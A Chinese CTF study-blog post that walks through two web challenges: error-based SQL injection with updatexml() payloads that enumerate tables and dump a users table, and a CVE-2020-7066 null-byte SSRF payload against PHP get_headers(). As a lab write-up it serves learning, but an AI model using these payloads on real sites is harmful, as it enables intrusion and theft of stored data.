被监督写博客-Day7

今天在ctftime上找了比赛,但是吧,不太行,只能等着明天结束后的wp了。。。
回归刷题日常
题目一:
[极客大挑战 2019]HardSQL(说真的,真的不喜欢SQL注入的题。。。)
打开题目后又是熟悉的界面。。。
看了wp说是报错注入,
学习一下两个函数

  • updatexml():更新xml文档
    语法updatexml(目标xml文档,xml路径,更新的内容)
  • extractvalue() :对XML文档进行查询的函数
    语法:extractvalue(目标xml文档,xml路径)
    两个函数的第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,即使没有所查询的内容也不会报错,但如果写入其他格式,就会报错,并且会返回写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。
    先是测验了一下,过滤了 union,or,and等等等
    构造报错注入的payload:
check.php?username=1%27or(updatexml(1,concat('~',database(),'~'),1))%23&password=123

concat():
连接字符串,这里将’/‘换成了’~’(或者0x7e),否则只是找不到/database()的路径,并不会报错。
在这里插入图片描述
爆出数据库

payload:

check.php?username=1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek')),0x7e),1))%23&password=123

group_concat():

爆出表名
payload:

check.php?username=1%27or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(%27H4rDsq1%27)),0x7e),1))%23&password=123

在这里插入图片描述

爆列名

payload:

check.php?username=1%27or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))%23&password=123

在这里插入图片描述
只出了一半的flag,(extractvalue和updatexml函数都只能一次最多显示32位)
接着要用到right():从字符串右端取指定个数字符
payload:

check.php?username=1%27or(updatexml(1,concat(0x7e,(select(group_concat(right(password,30)))from(H4rDsq1)),0x7e),1))%23&password=123

在这里插入图片描述
去掉重复的部分连起来就是flag

题目二:
[GKCTF2020]cve版签到
说是主要考察的是cve-2020-7066,ssrf 漏洞:
在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符(题目中用的%00),则URL将被静默地截断。这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。
get_headers():PHP系统级函数,返回一个包含有服务器响应一个 HTTP 请求所发送的标头的数组。如果失败则返回 FALSE 并发出一条 E_WARNING 级别的错误信息(可用来判断远程文件是否存在)。
payload:

?url=http://127.0.0.1%00www.ctfhub.com

在这里插入图片描述

payload:

?url=http://127.0.0.123%00www.ctfhub.com

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值